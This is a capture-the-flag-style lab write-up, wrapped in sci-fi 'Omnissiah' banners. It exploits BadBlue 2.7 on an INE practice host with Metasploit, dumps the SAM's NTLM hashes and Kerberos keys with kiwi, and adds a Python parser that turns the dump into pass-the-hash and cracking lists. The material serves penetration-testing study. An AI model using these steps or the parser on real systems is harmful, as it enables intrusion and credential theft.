+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
Tools used
Metasploit framework
Nmap
Workflow:
Scanning:
db_nmap -sS -sV -T4 -Pn demo.ine.local -v
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http BadBlue httpd 2.7
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: 5357/tcp open http Microsoft HTTPAPI httpd 2.0
BadBlue
BadBlue httpd 2.7 is listening on port 80, and Metasploit ships an exploit module for it:
exploit/windows/http/badblue_passthru
Running that module against demo.ine.local got us a Meterpreter session on the target running as Administrator.
Next we load kiwi, the Mimikatz integration for Metasploit, with:
load kiwi
Since the goal of the lab is to dump credentials (the NTLM hashes and the SysKey), kiwi is the right tool for the job. Reading the SAM needs SYSTEM, though, and the session is only Administrator, so before dumping we migrate into a SYSTEM process: ps to find the PID of lsass.exe, then migrate <pid>. Two checks before doing that: kiwi wants a Meterpreter of the same architecture as the OS (an x86 session on x64 Windows prints a warning when kiwi loads and some of its commands then fail, so pick a 64-bit process), and lsass.exe is the least forgiving process to inject into, because a failed migration can crash it and force a reboot; getsystem, or migrating into any other SYSTEM process, gives the same privileges with less risk. Once the session is SYSTEM, everything we need comes from:
lsa_dump_sam
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : ed1f5e64aad3727f03522bbddc080d77
* Primary:Kerberos-Newer-Keys *
Default Salt : ATTACKDEFENSEAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f566d48c0c62f88d997e9e56b52eed1696aead09df3100982bcfc5920655da5d
aes128_hmac (4096) : bf0ca9e206e82ce481c818070bef0855
des_cbc_md5 (4096) : 6d570d08df8979fe
OldCredentials
aes256_hmac (4096) : 69d101a02f3f4648bf9875f10c1cd268d3f500c3253ab862222a9e1bb3740247
aes128_hmac (4096) : 3c3fd899f7f004ed44e9e48f868a5ddc
des_cbc_md5 (4096) : 9b808fb9e0cbb3b5
OlderCredentials
aes256_hmac (4096) : 4cbbe8ad8482ca76952b08cd9103ba91af35c9d8b21a3d49c332e072618a9fa9
aes128_hmac (4096) : b18addd75f8a2b106b262c7b5e517623
des_cbc_md5 (4096) : 7fe0c2a15eb32fcd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : ATTACKDEFENSEAdministrator
Credentials
des_cbc_md5 : 6d570d08df8979fe
OldCredentials
des_cbc_md5 : 9b808fb9e0cbb3b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a1528cd40d99e5dfa9fa0809af998696
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227
des_cbc_md5 (4096) : ce9b2cabd55df4ce
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : ce9b2cabd55df4ce
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8e5edf45f3a42335f1f4906a24a08fe
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-R69684Tstudent
Default Iterations : 4096
Credentials
aes256_hmac (4096) : bab064fdaf62216a1577f1d5cd88e162f6962b4a421d199adf4c66b61ec6ac7c
aes128_hmac (4096) : 42bc1d17d1236d3afc09efbeba547d2c
des_cbc_md5 (4096) : 1a975b02a7bf15d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-R69684Tstudent
Credentials
des_cbc_md5 : 1a975b02a7bf15d5
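A few notes on reading that dump: Domain is the local machine name and Local SID is the machine SID, so these are local SAM accounts, not domain ones; accounts that have no Hash NTLM line (Guest, DefaultAccount) simply have no stored NT hash; and the first Credentials block under Kerberos-Newer-Keys holds the current AES keys, with OldCredentials and OlderCredentials being previous passwords. What you usually want next is a hashcat- or pass-the-hash-ready list rather than the raw text, so here is a small parser for it. This is an added example written for this writeup, not code from the lab or from Metasploit's kiwi extension; the SAMPLE_DUMP it runs on is constructed in kiwi's layout with made-up hash values and a made-up svc_backup account, and the function names are the example's own. It emits pwdump-format lines, skips accounts with no stored NT hash, flags the well-known hash of an empty password, and notes accounts whose Kerberos salt does not begin with the current machine name.

```python
"""Turn kiwi `lsa_dump_sam` output into pwdump lines and a quick triage.

Added example for this writeup; it is not part of the lab, of Metasploit or of
the kiwi extension. Function names and the sample dump are the example's own.
"""
import re
from typing import Any, Dict, List, Optional, Tuple

# Well-known hashes of the empty password. kiwi prints no LM hash on current
# Windows, so pwdump lines carry the empty-LM value in the LM field.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the layout kiwi prints. All hash/key values are made
# up; Guest has no stored NT hash and svc_backup has an empty password.
SAMPLE_DUMP = """\
Domain : ATTACKDEFENSE
SysKey : 00112233445566778899aabbccddeeff
Local SID : S-1-5-21-1111111111-2222222222-3333333333
SAMKey : ffeeddccbbaa99887766554433221100
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 0123456789abcdef0123456789abcdef
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ATTACKDEFENSEAdministrator
    Credentials
      aes256_hmac       (4096) : 1111111111111111111111111111111111111111111111111111111111111111
      aes128_hmac       (4096) : 22222222222222222222222222222222
    OldCredentials
      aes256_hmac       (4096) : 3333333333333333333333333333333333333333333333333333333333333333
RID  : 000001f5 (501)
User : Guest
RID  : 000003e9 (1001)
User : svc_backup
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000003f0 (1008)
User : student
  Hash NTLM: fedcba9876543210fedcba9876543210
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : EC2AMAZ-R69684Tstudent
"""

HEADER_RE = re.compile(r"^\s*(Domain|SysKey|Local SID|SAMKey)\s*:\s*(\S+)")
RID_RE = re.compile(r"^\s*RID\s*:\s*[0-9a-fA-F]+\s*\((\d+)\)")
FIELD_RES = {
    "user": re.compile(r"^\s*User\s*:\s*(\S+)"),
    "ntlm": re.compile(r"^\s*Hash NTLM\s*:\s*([0-9a-fA-F]{32})\s*$"),
    "salt": re.compile(r"^\s*Default Salt\s*:\s*(\S+)"),
}
AES_RE = re.compile(r"^\s*(aes256_hmac|aes128_hmac)\s*\(\d+\)\s*:\s*([0-9a-fA-F]+)")


def parse_lsa_dump_sam(text: str) -> Tuple[Dict[str, str], List[Dict[str, Any]]]:
    """Return (header fields, accounts). Each account keeps the first value seen
    for a field, so the AES keys are the current ones, not Old/OlderCredentials."""
    header: Dict[str, str] = {}
    accounts: List[Dict[str, Any]] = []
    cur: Optional[Dict[str, Any]] = None
    for line in text.splitlines():
        m = RID_RE.match(line)
        if m:
            cur = {"rid": int(m.group(1)), "user": None, "ntlm": None,
                   "salt": None, "aes256": None, "aes128": None}
            accounts.append(cur)
            continue
        if cur is None:  # still in the Domain/SysKey/SAMKey preamble
            m = HEADER_RE.match(line)
            if m:
                header[m.group(1)] = m.group(2)
            continue
        for key, rx in FIELD_RES.items():
            m = rx.match(line)
            if m and cur[key] is None:
                cur[key] = m.group(1).lower() if key == "ntlm" else m.group(1)
                break
        else:
            m = AES_RE.match(line)
            if m:
                key = "aes256" if m.group(1) == "aes256_hmac" else "aes128"
                if cur[key] is None:
                    cur[key] = m.group(2).lower()
    return header, accounts


def to_pwdump(accounts: List[Dict[str, Any]]) -> List[str]:
    """user:rid:lm:nt::: lines (hashcat -m 1000 --username, or pass-the-hash)."""
    return [f"{a['user']}:{a['rid']}:{EMPTY_LM}:{a['ntlm']}:::"
            for a in accounts if a["ntlm"]]


def triage(header: Dict[str, str], accounts: List[Dict[str, Any]]) -> Dict[str, List[str]]:
    """Bucket accounts the way you would prioritise them after a SAM dump."""
    out: Dict[str, List[str]] = {"pth_candidates": [], "empty_password": [],
                                 "no_stored_hash": [], "salt_mismatch": []}
    machine = header.get("Domain", "")
    for a in accounts:
        if a["ntlm"] is None:
            out["no_stored_hash"].append(a["user"])
            continue
        out["empty_password" if a["ntlm"] == EMPTY_NT else "pth_candidates"].append(a["user"])
        # The Kerberos salt is stored with the credential when the password is
        # set, so a salt that does not start with the current machine name
        # suggests the host was renamed after that password was last changed.
        if a["salt"] and machine and not a["salt"].startswith(machine):
            out["salt_mismatch"].append(a["user"])
    return out


if __name__ == "__main__":
    hdr, accts = parse_lsa_dump_sam(SAMPLE_DUMP)
    print(f"# {hdr['Domain']} {hdr['Local SID']} SysKey={hdr['SysKey']}")
    print("\n".join(to_pwdump(accts)))
    for bucket, users in triage(hdr, accts).items():
        print(f"{bucket}: {', '.join(users) or '-'}")
```

The regexes are whitespace-tolerant, so the flattened copy of the dump above parses too; run on it, student lands in salt_mismatch because its salt starts with EC2AMAZ-R69684T while the machine is now ATTACKDEFENSE, which suggests the box was renamed after that password was set. Administrator and student end up as pass-the-hash candidates, and Guest and DefaultAccount are reported as having no stored hash rather than silently producing a bogus pwdump line.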
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++